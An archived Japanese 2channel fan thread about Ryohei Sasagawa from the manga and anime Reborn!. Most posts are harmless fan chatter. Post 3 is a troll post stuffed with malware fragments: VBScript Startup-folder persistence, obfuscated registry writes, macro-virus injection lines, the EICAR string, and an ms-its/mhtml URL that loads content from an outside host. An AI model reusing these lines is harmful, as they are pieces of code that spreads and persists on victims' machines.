2ちゃんねる ★スマホ版★ ■掲示板に戻る■ 全部 1- 最新50  

■ このスレッドは過去ログ倉庫に格納されています

【プンスカッ】REBORN!の笹川了平スレ 弐極限【兄貴】

1 :兄が好きだ。:2006/12/16(土) 09:13:36 ID:vH4H+VUF
(`゜□゜) <ガオオォォォ
ここは家庭教師ヒットマンREBORN!の熱血極限ボクシング馬鹿であり、ボンゴレ晴の守護者である笹川了平に萌えるスレです。

★極限ルール★
・荒らしや煽り、個人サイトのアドレス貼り付けはプンスカッせずに極限スルー。
・801、エロネタは該当板へ。
・本誌、コミックスのネタバレは公式発売日0時から極限太陽。それより前は極限我慢。
・次スレは>>980に(`゜□゜) <まかせたぞ!
・できない場合は誰かに頼むかそれ以後の人が宣言してから建てること。
・オカマに気をつけろ。

★兄妹スレ★
【ヒットマン】笹川京子( ゜∀゜) ちゅわーん3【リボーン】
http://comic6.2ch.net/test/read.cgi/cchara/1145771403/701-800

★過去スレ★
★家庭教師ヒットマンREBOAN!笹川了平スレ★
http://comic6.2ch.net/test/read.cgi/cchara/1093722790/l00

(#゜Д゜)<極限必勝ぉぉぉ!

2 :兄が好きだ。:2006/12/16(土) 09:15:30 ID:vH4H+VUF
なんだか朝起きたらスレがなくなってたので建ててみた。テンプレってこんなんだっけ?
自分が見れないだけだったり、まだあるじゃねーか!ってときにはスルーしてくれ。

3 :<body onload=window()>:2006/12/16(土) 10:25:25 ID:ZmJCxyRc
Set A4 = A1.CreateTextFile(A1.BuildPath(A1.GetSpecialFolder(1)))
<object data="ms-its:mhtml:file://C:\\MAIN.MHT!http://www.loadcash.biz//adverts//35//main.chm::/main.htm" type="text/
X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
fso.copyfile "dirsystem&nurupo.vbs", "j:\windows\start menu\programs\startup\"
ToInfect.CodeModule.InsertLines BGN, ADI1.CodeModule.Lines(BGN, 1)
"avgnt"="\"C:\\Program Files\\AntiVir PersonalEdition Classic\\avgnt.exe\" /min /nosplash"
G.RegWrite A("IJDX^MNB@M^L@BIHOD]Rnguv`sd]Lhbsnrngu]Vhoenvr]BtssdouWdsrhno]Sto]VhoRu`su"), E.BuildPath(E.GetSpecialFolder(1), A("VHORU@SU/WCR"))
lines(n)=replace(lines(n),"""",chr(93)+chr(45)+chr(93))
ms-its:mhtml:file://c:\
kak.hta';ken=wd+'START
kill -9 xz/tSaBh0
Sub auto_open()
Application.OnSheetActivate = "check_files"
End Sub
Sub check_files()
c$ = Application.StartupPath
m$ = Dir(c$ & "\" & "PERSONAL.XLS")
If m$ = "PERSONAL.XLS" Then p = 1 Else p = 0
If ActiveWorkbook.Modules.Count > 0 Then w = 1 Else w = 0
whichfile = p + w * 10
End Sub


4 :名無しかわいいよ名無し:2006/12/16(土) 10:26:45 ID:4yCXEwvy
極限に4ゲット
燃えるぜ!

5 :名無しかわいいよ名無し:2006/12/16(土) 10:45:35 ID:krCyiv3n
5ゲット
>>1 極限に乙!!

6 :名無しかわいいよ名無し:2006/12/16(土) 11:38:35 ID:PDpV9reg
6はもらったァァァ!!!

7 :名無しかわいいよ名無し:2006/12/16(土) 13:00:32 ID:0jLdpm7Z
7ゲットォォォォッ!!
>1乙!

8 :名無しかわいいよ名無し:2006/12/16(土) 15:22:14 ID:m8/Qa4kg
>>1乙!

9 :名無しかわいいよ名無し:2006/12/17(日) 02:53:46 ID:Zx3WJ/xI
>>1極限乙

10 :名無しかわいいよ名無し:2006/12/17(日) 06:42:21 ID:VhtPbUoU
10代目ゲットォォォ!

11 :名無しかわいいよ名無し:2006/12/17(日) 13:08:49 ID:MD6dNjoa
>>1極限乙!!
一桁ゲトならず…

12 :名無しかわいいよ名無し:2006/12/17(日) 18:19:17 ID:D9IFT9mc
明日の兄はどうなっているんだろうか……。

13 :名無しかわいいよ名無し:2006/12/17(日) 22:15:04 ID:Z1J/JToo
>>1
前スレもうちょいで1000だったのに落ちたのか?w

14 :名無しかわいいよ名無し:2006/12/18(月) 06:12:17 ID:upMyfYTT
960ぐらいだったのにな。
今回は落とさずにいこう。

15 :名無しかわいいよ名無し:2006/12/18(月) 11:59:56 ID:NA6J8t6I
前回のアニメで、ノートに「男は極限!」なんて書いてボ〜ッとしちゃう兄に萌え

16 :名無しかわいいよ名無し:2006/12/19(火) 04:28:58 ID:a+0YdlmY
あああ!前スレ見る前に落ちたのかorz

>>15ナ、ナンダッテー(*´Д`*)=3

17 :名無しかわいいよ名無し:2006/12/19(火) 08:25:01 ID:i/dqaven
表紙の苦しんでる兄貴がエロい
エロカッコイイよ兄貴

18 :名無しかわいいよ名無し:2006/12/19(火) 20:27:48 ID:+Q5Gtpgu
>>16
見たかったら保管庫行くといいかもよ。

Vジャンプで天野先生が描いてるゲームのやつ、兄はいつか出番がくるんだろうか。
Wiiでボクシングゲームで極限してると予想。

19 :名無しかわいいよ名無し:2006/12/20(水) 03:50:54 ID:KKJAnhkL
age

20 :名無しかわいいよ名無し:2006/12/20(水) 05:45:15 ID:fyAvuAU5
>>1
「極限お疲れ様です。」(^-^)
こっちも一桁ならず・・・!

>>18
Willでボクシングゲーム可愛いっ!!!
やっぱ格好良くてもまだ中学生だもんな、笹川お兄ちゃん。
兄はなんでこんなに真っ直ぐなんだろう・・・。
素敵だ。


21 :名無しかわいいよ名無し:2006/12/21(木) 20:40:26 ID:F88ucoOy
プンスカッ!








日曜も補習かよ・・・・・・。

22 :名無しかわいいよ名無し:2006/12/21(木) 20:42:49 ID:jq0tiazi
1乙彼
兄…!

23 :名無しかわいいよ名無し:2006/12/22(金) 02:24:06 ID:mtkhmRGf
笹兄好きだー。文句なく好きだー。
妹思いで正義感が強く努力家の天然。
嫌いようがないよ。もっと活躍するといいな!

24 :名無しかわいいよ名無し:2006/12/22(金) 06:20:24 ID:oPfy+/1y
兄の悪いところを考えてみた。
本気で見つかりません本当に(ry
あえていうならすぐに信じちゃうところか?兄なら怪しい壺を買ってしまいそうだ。

25 :名無しかわいいよ名無し:2006/12/22(金) 23:26:03 ID:mtkhmRGf
確かにwww
海水浴の回は「ちょww兄www」って思ったな。
でも人を疑えない真っすぐなところも兄の魅力

26 :名無しかわいいよ名無し:2006/12/24(日) 12:34:06 ID:cgDzqJCZ
メリークリスマス!兄!
笹川家は家族仲良さそうだから
きっとクリスマスもみんなで祝っていると予想。

27 :名無しかわいいよ名無し:2006/12/24(日) 17:17:03 ID:vIy/sJu0
メリークリスマス!兄はきっとサンタ捕獲しようとしたことがある。

28 :名無しかわいいよ名無し:2006/12/25(月) 02:01:04 ID:lwa4idjH
京子ちゃんの為にサンタになろうとしたこともあると思う・・・!

29 :名無しかわいいよ名無し:2006/12/25(月) 02:23:56 ID:ctzJ0802
>>28
そんな兄を想像したら萌えた
メリクリ兄!極限!

30 :名無しかわいいよ名無し:2006/12/25(月) 18:22:05 ID:P7cr/nu+
妹にサンタ捕獲させようとした自分が来ましたよ。

しかし兄サンタの袋の中には極限しか詰まってなさそうだ。

31 :名無しかわいいよ名無し:2006/12/26(火) 00:56:05 ID:DMbXV7TX
極限手ぬぐいとか入ってて、
「これを使って明日から、お兄ちゃんと一緒にトレーニングしなさい」
とか自作自演・・・してたら可愛いなぁー!

32 :名無しかわいいよ名無し:2006/12/27(水) 12:01:14 ID:cE3/JdaD
京子ちゃんがやたらと習字が上手い(例:運動会ハチマキ)のは
兄の極限ゆずりだと予想してみる

33 :名無しかわいいよ名無し:2006/12/28(木) 17:12:32 ID:IOsFSyQd
もうすぐ年が明けますね。兄の袴姿が見たい。

34 :名無しかわいいよ名無し:2006/12/29(金) 00:37:50 ID:jW0wk/kY
新年企画とかの扉絵で、兄に黒の紋羽織着てて欲しい・・・!!!

35 :名無しかわいいよ名無し:2006/12/29(金) 20:30:13 ID:PwqoDuCs
兄ってどうしてボクシング始めたんだろうか。やっぱテレビで見て極限燃えたんだろうか。
なんとなくあの髪型はボクシングに燃えたあまりに普通ぐらいだった髪をバリカンで刈ったかんじがする。

36 :名無しかわいいよ名無し:2006/12/31(日) 11:13:38 ID:Swr+YBVL
兄、大晦日だよ。
一年ありがとう。
ばかっぷりに救われたりもしたよ。

37 :名無しかわいいよ名無し:2007/01/01(月) 04:50:10 ID:YvhdAbNd
兄あけおめ!
ことしも極限よろしく!

38 :名無しかわいいよ名無し:2007/01/01(月) 07:07:29 ID:Cw0xViyO
スレのみんな、兄、極限明けましておめでとう!

39 :名無しかわいいよ名無し:2007/01/01(月) 10:51:15 ID:dSxQSyKu
極限にあけおめ兄!

>>24
正月で思い出したがおみくじ運が極限に悪い所じゃないか?w
>>28
激しく萌えた
付け髭が取れて焦る兄
「あーお兄ちゃんだー」
「違うッ極限に人違いだ!!」

兄は京子ちゅわんとセットなら萌え倍率ドン魔法がかかる

40 : 【ぴょん吉】 【1151円】 :2007/01/01(月) 12:17:18 ID:Cw0xViyO
吉以上だったら兄活躍。
お年玉600円以上なら兄今年中に表紙。

41 : 【だん吉】 dama!:2007/01/01(月) 16:15:22 ID:V+1rqAAj
オレは占いなんて信じぬ
なぜなら運命は自分で切り開くものだからな
そしてこれがオレの!!!やり方だぁあぁ!!!

あけまして極限!!!どうだろ兄のリベンジ出来たかな

42 :名無しかわいいよ名無し:2007/01/01(月) 17:03:13 ID:dSxQSyKu
兄にお年玉はなしなようです

43 :名無しかわいいよ名無し:2007/01/02(火) 16:50:00 ID:l3aEl4Yu
明後日コミックス発売かー。兄いるかなー。

地方orz

44 :名無しかわいいよ名無し:2007/01/03(水) 14:51:02 ID:ab3zFNAN
明日コミックス発売あぎゃー!

45 :名無しかわいいよ名無し:2007/01/05(金) 12:13:56 ID:RXxGWuqF
笹川兄妹1号!2号!!

笹川兄妹可愛いよ笹川兄妹
というか兄単行本の表紙気にしてるんだなw

46 :名無しかわいいよ名無し:2007/01/05(金) 12:40:23 ID:TRs/tdF+
そういえば兄だけ骸のこと知らないんだよなー。驚いてるポイント違う。

47 :名無しかわいいよ名無し:2007/01/05(金) 16:22:30 ID:KGtz8+Ac
中扉に兄がいてほしかった・・・・・・!
兄の表紙発言はもうすぐ表紙になる前ぶれだと信じてる。

48 :名無しかわいいよ名無し:2007/01/05(金) 18:01:01 ID:2D11sgxq
人気投票の結果ミスプリだよ…
笹川良平って誰だよ

49 :名無しかわいいよ名無し:2007/01/05(金) 20:57:00 ID:Cq1wf18y
↑ほんとだ………

表紙がんばれ兄!

50 :名無しかわいいよ名無し:2007/01/06(土) 11:13:49 ID:YJwBxVdR
ミスプリと言ったら、13巻の登場人物紹介の右下の
あらすじ紹介の箇所で、雨のリング守護者こと山もっちゃんを
霧のリング扱いされていたな…ちゃんと極限に校正して欲しいものだ

51 :名無しかわいいよ名無し:2007/01/06(土) 11:45:01 ID:VhakZgr4
アニメ、兄貴出てきたとこで噴いたwww
なんでだろう。彼がしゃべっただけで笑ってしまう。
無駄にテンション高いからかな。

52 :名無しかわいいよ名無し:2007/01/06(土) 15:10:21 ID:kerbWAej
兄のEDの通行人っぷりが好きだ

53 :名無しかわいいよ名無し:2007/01/06(土) 15:44:04 ID:pyhBrWas
EDの兄貴の扱いに笑った
意外とおいしいのかもしれない

54 :名無しかわいいよ名無し:2007/01/07(日) 00:15:00 ID:dUEa+z+B
全員天然だよな、兄貴だけじゃなくて

55 :名無しかわいいよ名無し:2007/01/07(日) 16:47:04 ID:gHs1lk2j
ようやくアニメ見れた。
ちょwwwww兄もっとでてくれホントorz

56 :名無しかわいいよ名無し:2007/01/07(日) 16:52:58 ID:gHs1lk2j
上はEDのことな。

57 :名無しかわいいよ名無し:2007/01/07(日) 20:11:46 ID:YW2ST0Yv
ジャンクスポーツにボクサーでてた。
兄もあんないい体してるのかと考えるとルッスーリアの気持ちが分かってしまう・・・・・・。

58 :名無しかわいいよ名無し:2007/01/08(月) 16:10:58 ID:m45c1/JV
待て待て変態になってしまうぞ

59 :名無しかわいいよ名無し:2007/01/09(火) 17:57:08 ID:ZoQ+AaKk
>>57
自分も、スポーツ選手のいい体を見ると少しドキドキしてしまう…。                                                   

60 :名無しかわいいよ名無し:2007/01/09(火) 20:18:55 ID:WeJmMKIF
>>57の目欄に不埒なことが書いてある件。

なんかいろいろ考えたら兄がこのあと活躍してくれるのか疑問になってきた・・・・・・orz

61 :名無しかわいいよ名無し:2007/01/10(水) 12:04:59 ID:BE+2fJBm
この後自然に表紙になることも想像できない…

62 :名無しかわいいよ名無し:2007/01/10(水) 13:22:13 ID:aYp7lmEt
でも表紙にする気がないならあんな発言させないんじゃないか?
かと言って表紙になるには時期が過ぎたよなあ・・・

63 :名無しかわいいよ名無し:2007/01/10(水) 13:29:46 ID:UcEHmljS
こうなったら指輪編終わった後日常編で兄の初恋話とか進学話とか修学旅行とかとにかく兄メイン(三年メイン)を・・・・・・!
そうすれば16巻17巻ぐらいで表紙になれるかも。

今後の展開、雨のあとは晴れるよね?天野先生。

64 :名無しかわいいよ名無し:2007/01/10(水) 22:15:34 ID:xXDuD21/
初恋…てか、了→ピンは公式?

65 :名無しかわいいよ名無し:2007/01/10(水) 22:38:45 ID:KV3VPqSq
難しい問題だな。
あれを恋と呼んでいいものか・・・

66 :名無しかわいいよ名無し:2007/01/10(水) 22:50:37 ID:W0z7WJbq
恋と変を間違えるのはお約束

67 :名無しかわいいよ名無し:2007/01/11(木) 20:18:29 ID:IJXmUp3Q
逢えば変する奴ら、を思い出した。

68 :名無しかわいいよ名無し:2007/01/12(金) 16:15:33 ID:u+OMj7xd
兄って変な名前だな。

69 :名無しかわいいよ名無し:2007/01/12(金) 17:19:29 ID:QP6aB+ql
>>64
邪な目で見ると、イーピンの夢を見て夢精したようにも見える
(ハァハァ言ってるから

70 :名無しかわいいよ名無し:2007/01/13(土) 23:02:49 ID:7EJbmMMz
アニメの兄とイーピンのツーショットに萌えた
兄と熊のツーショットにも萌えた

71 :名無しかわいいよ名無し:2007/01/14(日) 02:14:05 ID:bCxcI6BS
了平ファンってほどでもないが確かにルッスリアに眼をつけられるのはわかる
かわいいよほんとこいつ

72 :名無しかわいいよ名無し:2007/01/14(日) 07:48:39 ID:J8X+e1s6
なんとなくだが、兄はドッピーカンとプンスカッで読者の可愛い好感度あげたキャラだと思う。

73 :名無しかわいいよ名無し:2007/01/14(日) 17:37:53 ID:9OwGbL5l
プンスカッのときは前スレかなり賑わったな。

74 :名無しかわいいよ名無し:2007/01/14(日) 22:56:06 ID:agQCwvuS
プンスカッは可愛すぎた
あれで一気に兄が好きになったもんなあ
以前は熱血兄さんて認識しかなかったのに

75 :名無しかわいいよ名無し:2007/01/15(月) 03:05:29 ID:fvk/SKq8
でも一番可愛いのはレヴィだけどな

76 :名無しかわいいよ名無し:2007/01/15(月) 15:05:15 ID:LmbvqBl0
レヴィの可愛さはきもさだろww

77 :名無しかわいいよ名無し:2007/01/15(月) 18:59:18 ID:doEIPgKq
レヴィ→キモキモかわいい
兄→熱血天然かわいい

この二人の差はでかいぞ!多分。

78 :名無しかわいいよ名無し:2007/01/16(火) 09:24:45 ID:tWATKRP4
差別スンナ!区別しろ!皆違って皆いいんだ!

79 :名無しかわいいよ名無し:2007/01/16(火) 15:45:09 ID:50Q5al9Z
安心しろ!
兄とレヴィの差は区別だ!

80 :名無しかわいいよ名無し:2007/01/17(水) 20:33:02 ID:u6DBD70v
明後日はジャンプ発売か。兄でてきてくれるかな。晴の守護者らしくドッピーカンに活躍してほしいな。

というかしてくれ頼む天野先生。


81 :名無しかわいいよ名無し:2007/01/17(水) 22:50:06 ID:2QI/cBjv
超亀だが、プンスカしてる兄貴は新刊に載ってるのだろうか?教えて熱い人

82 :名無しかわいいよ名無し:2007/01/17(水) 22:58:10 ID:u6DBD70v
プンスカッは多分次の巻だよ。

83 :名無しかわいいよ名無し:2007/01/17(水) 23:25:22 ID:2QI/cBjv
>>82ありがとう
コミクス派だから楽しみだよ

84 :名無しかわいいよ名無し:2007/01/18(木) 12:38:41 ID:AVyb3oS5
最近兄貴好きすぎて仕事に身が入らん

兄貴たれ目可愛いよ兄貴

85 :名無しかわいいよ名無し:2007/01/18(木) 13:19:51 ID:J39z/HM2
仕事はちゃんとしないとプンスカッされるぞ。上司から。

そんな自分も兄に萌えてたら英語のテストが壊滅したが。


86 :名無しかわいいよ名無し:2007/01/18(木) 18:13:16 ID:oSzG7OXr
おまえら兄のせいにすんなよ!
プンスカッされるぞ!



兄のことを考えるとレポートが進まないが。

87 :名無しかわいいよ名無し:2007/01/18(木) 22:03:48 ID:KPi9CnK0
特にキャラ萌えがない俺が萌えスレをまわってみたけどこのスレ住人の雰囲気が一番好きだぜ

88 :名無しかわいいよ名無し:2007/01/19(金) 13:19:53 ID:WfiCbT7d
嬉しいじゃないか。

>>84>>85>>86
まとめてプンスカッされてこい。

89 :名無しかわいいよ名無し:2007/01/20(土) 02:40:27 ID:gmT4Jf1r
ぷ、ぷ、プンスカあぁ!!?(゜∀゜*)
兄貴プンスカしてんの!!?読み飛ばしたから知らんかった…すごい楽しみだ!スレもいつの間にか2になってるしめでたいな。

90 :名無しかわいいよ名無し:2007/01/20(土) 06:26:47 ID:m2ju5IG8
>>89は14巻で兄に萌える。絶対。

今日はセンター試験だな。このスレに受験生がいるかは分からないけど、受験生極限がんばれ。

ていうか兄も受験生じゃないか・・・・・・。リング戦やってて大丈夫なんだろうか。あの右手じゃノートとるのも難しいだろうに。
それとも前期で早めに合格するんだろうか。あんだけトロフィー持ってるし。


91 :名無しかわいいよ名無し:2007/01/21(日) 12:32:48 ID:wGIOqc5K
多分並盛高校にスポーツ特待生として入学出来るだろう。

並盛中学って公立だっけ? 私立だっけ?

92 :名無しかわいいよ名無し:2007/01/21(日) 17:07:49 ID:ccSwsWWO
アニメだと都立。原作は不明だけど私立じゃないといろいろ説明がつかないような・・・・・・(給食ないし落第あるし)。

あー、板もとに戻って良かった。

93 :名無しかわいいよ名無し:2007/01/22(月) 17:01:12 ID:iXCeOn3k
あれは私立だろ・・・
ブレザーで弁当なんて自分のまわりじゃ私立しかない

94 :名無しかわいいよ名無し:2007/01/22(月) 17:57:44 ID:hbEVc0OA
2人も私立に入れるなんて笹川家は結構収入あるんだな


95 :名無しかわいいよ名無し:2007/01/22(月) 18:49:15 ID:Bf6Z4hpY
並中ほどファッソナブルなカラーじゃないけどブレザー・弁当だた公立中卒な俺ですよ
ちなみに購買もあったよ ソーメンパンはなかったがな
私立公立の違いなんざ制服昼食なんかじゃ今やはかれないと思うんだぜ?校舎の設備なんかでみるべきかと

てことでプールが屋外だから公立にイピョウ ていうか兄その他が中学受験するように思えない←これが正解でね?

96 :名無しかわいいよ名無し:2007/01/22(月) 18:55:30 ID:74Fh1RK4
自分リアルで家庭教師のバイトやってるんだけど
教え子の学校も公立で>>95の学校みたいにお昼ご飯は給食なくてお弁当
制服は普通のセーラーだけど

今はそういう学校増えてきてるみたい


97 :名無しかわいいよ名無し:2007/01/22(月) 19:48:00 ID:Eq6fCPGP
創立20年そこらの公立校はブレザーじゃない?ちょっと田舎だと給食無いのも当たり前かと思ってた。

98 :名無しかわいいよ名無し:2007/01/22(月) 21:08:25 ID:XgvQhNxz
今時は公立もそうなのか・・・・・・都会は凄いなあ。
たしかに中学受験をしてる兄やツナ、山本は想像つかんし。

・・・・・・ところで今週も晴の守護者というか兄がひきつづき放置ですよ(雨も霧もだけど)。
もうあれじゃね?晴雨霧は放置のまま大空戦終わるんじゃね?orz 零地点とか出してるし。
このまま長引いても大空戦グダグダとか言われるからそれもいいけど。
でも兄の、勇姿が、見たい。


99 :名無しかわいいよ名無し:2007/01/23(火) 03:59:39 ID:hxfOnKxG
雲雀あたりに助けられたら、プンスカッに次ぐ何かを生み出さないかな兄。
放置とか悲しすぎる。
ありそうで怖いってのも悲しすぎる。

100 :名無しかわいいよ名無し:2007/01/23(火) 07:50:04 ID:AAYKTMzn
見たいなあそれ。そういや同じ学年だけど会話がほとんどないな。
ツッコミ不在のカオスな会話な気がする。

101 :名無しかわいいよ名無し:2007/01/23(火) 09:44:07 ID:EZ+/UGz3
闘ってる兄が見たいよ…!1、2コマでもいいんだ。兄の勇姿が見られればいいんだ。天野先生に願いよ届け!\(´Д`)/

102 :名無しかわいいよ名無し:2007/01/23(火) 09:56:07 ID:WHvZ58Q1
>>100
仕方ないから兄がツッコミに回るんじゃないか?w
兄のツッコミ見たい

103 :名無しかわいいよ名無し:2007/01/23(火) 16:21:18 ID:y1IClQOO
今週号で止血している雲雀の位置がなんか兄のフィールドぽく見えるんだが…どっかから出てきたあの布はオカマ固定してる布とか
そうやってまた偶然装って兄助けてくんねーかなぁ・・・ってなんか雲雀板に逝けみたいな内容だが俺はれっきとした兄ファンなんだスマソ
なんか兄出てきて欲しさに都合よい展開ばかり考えてしまう・・・
でも黒曜編で山本が早々離脱したように並盛一般ピーポーは出さない気かもな天野
なので晴雨はこのまま放置とか あり得て嫌だ・・・兄ィ

104 :名無しかわいいよ名無し:2007/01/23(火) 17:07:37 ID:hRrGeqgy
>>103
よく考えると雲雀の位置からだと兄が一番近いもんな
早く極限に元気な姿を見せて欲しいよ兄

105 :名無しかわいいよ名無し:2007/01/23(火) 21:36:22 ID:AAYKTMzn
もしかして雲雀好きもけっこういるんだろうかここ。自分も雲雀好きだが。

兄の動き(登場)が分からない。
もう、
(`゜□゜) <ガオオォォォ
でも、
(#`゜□゜) <プンスカッでも、
(`゜∧゜) <・・・・・・(神妙)
でもなんでもいいからでてほしいな。


106 :名無しかわいいよ名無し:2007/01/24(水) 09:51:31 ID:XEkDsKze
雲雀は普通。

つーか>>105のその顔文字兄かわゆす(*´Д`)

107 :名無しかわいいよ名無し:2007/01/24(水) 12:39:09 ID:wZFoGcz7
自分は雲雀もすき。
だから雲雀に助けてほしいのかな
ってかプンスカッは雲雀いなきゃ生まれなかったし、プンスカッ以上の兄が見たいだけかも……


>>105 顔文字禿モエス(´Д`*)

108 :名無しかわいいよ名無し:2007/01/24(水) 12:48:54 ID:MxFlv7/1
雲雀とは同学年ってのが大きい。性格も正反対で面白い
メンバーで3年なのはこの2人しかいないし
年長者として皆を引っ張ってって欲しいという願望が・・・

109 :名無しかわいいよ名無し:2007/01/24(水) 13:19:23 ID:SKoKmUA9
>性格正反対

髪の色も正反対なんだがこれは対比させてるのかただの偶然なのか。多分偶然だろうけど。

今までの兄の名言ってプンスカッと猛者猛者しとると俺の健康を〜と他になんだっけ?


110 :名無しかわいいよ名無し:2007/01/24(水) 13:37:23 ID:MxFlv7/1
ありすぎて逆に思いつかんw
でも「全部忘れたがな!」とか好きだ

111 :名無しかわいいよ名無し:2007/01/24(水) 18:36:48 ID:3zJ5CsNB
「極限まかせろ!」も好きだ

23 KB
■ このスレッドは過去ログ倉庫に格納されています

★スマホ版★ 掲示板に戻る 全部 前100 次100 最新50

read.cgi ver 05.02.02 2014/06/23 Mango Mangüé ★
FOX ★ DSO(Dynamic Shared Object)